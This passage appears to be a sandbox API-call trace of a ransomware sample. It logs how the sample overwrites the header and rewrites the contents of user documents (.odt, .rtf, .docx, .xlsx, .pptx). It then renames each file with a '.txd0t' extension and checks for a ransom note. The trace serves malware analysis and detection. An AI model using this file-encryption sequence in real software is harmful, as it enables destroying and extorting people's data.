y2TBjiEU\\MXMHgMI.ods" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\mxmhgmi.ods"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\MXMHgMI.ods.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\mxmhgmi.ods.txd0t")) returned 1 [0074.724] SetEvent (hEvent=0x3f8) returned 1 [0074.724] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.725] StrCpyW (in: psz1=0x37ff450, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\Uct9z.odt" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\Uct9z.odt") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\Uct9z.odt" [0074.725] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\Uct9z.odt", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\Uct9z.odt.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\Uct9z.odt.txd0t" [0074.725] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\Uct9z.odt.txd0t") returned 0 [0074.725] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\Uct9z.odt", dwFileAttributes=0x80) returned 1 [0074.726] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\Uct9z.odt" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\uct9z.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0074.726] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=7607) returned 1 [0074.726] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.726] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.727] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffe049, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.727] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x1db0, lpNumberOfBytesRead=0x37ff410, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff410*=0x1db0, lpOverlapped=0x0) returned 1 [0074.728] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffe250, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.728] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x1db0, lpNumberOfBytesWritten=0x37ff414, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff414*=0x1db0, lpOverlapped=0x0) returned 1 [0074.728] FlushFileBuffers (hFile=0x460) returned 1 [0074.730] GetProcessHeap () returned 0xe30000 [0074.730] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x136) returned 0xe9b648 [0074.730] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\Uct9z.odt" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\Uct9z.odt") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\Uct9z.odt" [0074.730] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\Uct9z.odt") returned="Uct9z.odt" [0074.730] StrCpyW (in: psz1=0xe9b6c4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.730] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\!TXDOT_READ_ME!.txt") returned 1 [0074.730] GetProcessHeap () returned 0xe30000 [0074.730] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0074.730] CloseHandle (hObject=0x460) returned 1 [0074.731] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\Uct9z.odt" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\uct9z.odt"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\Uct9z.odt.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\uct9z.odt.txd0t")) returned 1 [0074.731] SetEvent (hEvent=0x3f8) returned 1 [0074.731] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.732] StrCpyW (in: psz1=0x37ff440, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VcL01ptYXVDK5.rtf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VcL01ptYXVDK5.rtf") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VcL01ptYXVDK5.rtf" [0074.732] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VcL01ptYXVDK5.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VcL01ptYXVDK5.rtf.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VcL01ptYXVDK5.rtf.txd0t" [0074.732] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VcL01ptYXVDK5.rtf.txd0t") returned 0 [0074.733] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VcL01ptYXVDK5.rtf", dwFileAttributes=0x80) returned 1 [0074.733] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VcL01ptYXVDK5.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\vcl01ptyxvdk5.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0074.733] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=83855) returned 1 [0074.733] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.733] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.734] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffeb671, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.734] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x14780, lpNumberOfBytesRead=0x37ff400, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff400*=0x14780, lpOverlapped=0x0) returned 1 [0074.736] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffeb880, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.736] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x14780, lpNumberOfBytesWritten=0x37ff404, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff404*=0x14780, lpOverlapped=0x0) returned 1 [0074.738] FlushFileBuffers (hFile=0x460) returned 1 [0074.740] GetProcessHeap () returned 0xe30000 [0074.740] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x146) returned 0xe9b648 [0074.740] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VcL01ptYXVDK5.rtf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VcL01ptYXVDK5.rtf") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VcL01ptYXVDK5.rtf" [0074.740] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VcL01ptYXVDK5.rtf") returned="VcL01ptYXVDK5.rtf" [0074.740] StrCpyW (in: psz1=0xe9b6c4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.740] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\!TXDOT_READ_ME!.txt") returned 1 [0074.740] GetProcessHeap () returned 0xe30000 [0074.740] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0074.740] CloseHandle (hObject=0x460) returned 1 [0074.742] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VcL01ptYXVDK5.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\vcl01ptyxvdk5.rtf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VcL01ptYXVDK5.rtf.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\vcl01ptyxvdk5.rtf.txd0t")) returned 1 [0074.743] SetEvent (hEvent=0x3f8) returned 1 [0074.743] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.744] StrCpyW (in: psz1=0x37ff440, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VSf1IL-6_DKVGroXOg.docx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VSf1IL-6_DKVGroXOg.docx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VSf1IL-6_DKVGroXOg.docx" [0074.744] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VSf1IL-6_DKVGroXOg.docx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VSf1IL-6_DKVGroXOg.docx.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VSf1IL-6_DKVGroXOg.docx.txd0t" [0074.744] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VSf1IL-6_DKVGroXOg.docx.txd0t") returned 0 [0074.744] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VSf1IL-6_DKVGroXOg.docx", dwFileAttributes=0x80) returned 1 [0074.745] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VSf1IL-6_DKVGroXOg.docx" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\vsf1il-6_dkvgroxog.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0074.745] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=41999) returned 1 [0074.745] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.745] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.746] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffff59f1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.746] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xa400, lpNumberOfBytesRead=0x37ff400, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff400*=0xa400, lpOverlapped=0x0) returned 1 [0074.747] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffff5c00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.747] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xa400, lpNumberOfBytesWritten=0x37ff404, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff404*=0xa400, lpOverlapped=0x0) returned 1 [0074.747] FlushFileBuffers (hFile=0x460) returned 1 [0074.751] GetProcessHeap () returned 0xe30000 [0074.751] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x152) returned 0xeca148 [0074.751] StrCpyW (in: psz1=0xeca148, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VSf1IL-6_DKVGroXOg.docx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VSf1IL-6_DKVGroXOg.docx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VSf1IL-6_DKVGroXOg.docx" [0074.751] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VSf1IL-6_DKVGroXOg.docx") returned="VSf1IL-6_DKVGroXOg.docx" [0074.751] StrCpyW (in: psz1=0xeca1c4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.751] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\!TXDOT_READ_ME!.txt") returned 1 [0074.751] GetProcessHeap () returned 0xe30000 [0074.751] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xeca148 | out: hHeap=0xe30000) returned 1 [0074.751] CloseHandle (hObject=0x460) returned 1 [0074.752] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VSf1IL-6_DKVGroXOg.docx" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\vsf1il-6_dkvgroxog.docx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VSf1IL-6_DKVGroXOg.docx.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\vsf1il-6_dkvgroxog.docx.txd0t")) returned 1 [0074.753] SetEvent (hEvent=0x3f8) returned 1 [0074.753] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.756] StrCpyW (in: psz1=0x37ff450, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\w3sXXqR.xlsx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\w3sXXqR.xlsx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\w3sXXqR.xlsx" [0074.756] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\w3sXXqR.xlsx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\w3sXXqR.xlsx.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\w3sXXqR.xlsx.txd0t" [0074.756] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\w3sXXqR.xlsx.txd0t") returned 0 [0074.756] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\w3sXXqR.xlsx", dwFileAttributes=0x80) returned 1 [0074.757] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\w3sXXqR.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\w3sxxqr.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0074.757] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=74321) returned 1 [0074.757] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.757] WriteFile (in: hFile=0x478, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.758] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffedbaf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.758] ReadFile (in: hFile=0x478, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x12250, lpNumberOfBytesRead=0x37ff410, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff410*=0x12250, lpOverlapped=0x0) returned 1 [0074.760] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffeddb0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.760] WriteFile (in: hFile=0x478, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x12250, lpNumberOfBytesWritten=0x37ff414, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff414*=0x12250, lpOverlapped=0x0) returned 1 [0074.760] FlushFileBuffers (hFile=0x478) returned 1 [0074.762] GetProcessHeap () returned 0xe30000 [0074.762] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x13c) returned 0xe9b648 [0074.762] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\w3sXXqR.xlsx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\w3sXXqR.xlsx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\w3sXXqR.xlsx" [0074.762] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\w3sXXqR.xlsx") returned="w3sXXqR.xlsx" [0074.762] StrCpyW (in: psz1=0xe9b6c4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.762] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\!TXDOT_READ_ME!.txt") returned 1 [0074.763] GetProcessHeap () returned 0xe30000 [0074.763] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0074.763] CloseHandle (hObject=0x478) returned 1 [0074.765] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\w3sXXqR.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\w3sxxqr.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\w3sXXqR.xlsx.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\w3sxxqr.xlsx.txd0t")) returned 1 [0074.766] SetEvent (hEvent=0x3f8) returned 1 [0074.766] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.767] StrCpyW (in: psz1=0x37ff440, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\iTea.pptx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\iTea.pptx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\iTea.pptx" [0074.767] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\iTea.pptx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\iTea.pptx.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\iTea.pptx.txd0t" [0074.767] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\iTea.pptx.txd0t") returned 0 [0074.767] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\iTea.pptx", dwFileAttributes=0x80) returned 1 [0074.767] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\iTea.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\_hv0qcp0pks\\itea.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0074.767] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=13713) returned 1 [0074.767] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.768] WriteFile (in: hFile=0x478, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.768] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xffffc86f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.768] ReadFile (in: hFile=0x478, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x3590, lpNumberOfBytesRead=0x37ff400, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff400*=0x3590, lpOverlapped=0x0) returned 1 [0074.769] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xffffca70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.769] WriteFile (in: hFile=0x478, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x3590, lpNumberOfBytesWritten=0x37ff404, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff404*=0x3590, lpOverlapped=0x0) returned 1 [0074.769] FlushFileBuffers (hFile=0x478) returned 1 [0074.771] GetProcessHeap () returned 0xe30000 [0074.771] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x14e) returned 0xeca148 [0074.771] StrCpyW (in: psz1=0xeca148, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\iTea.pptx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\iTea.pptx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\iTea.pptx" [0074.771] PathFindFileNameW 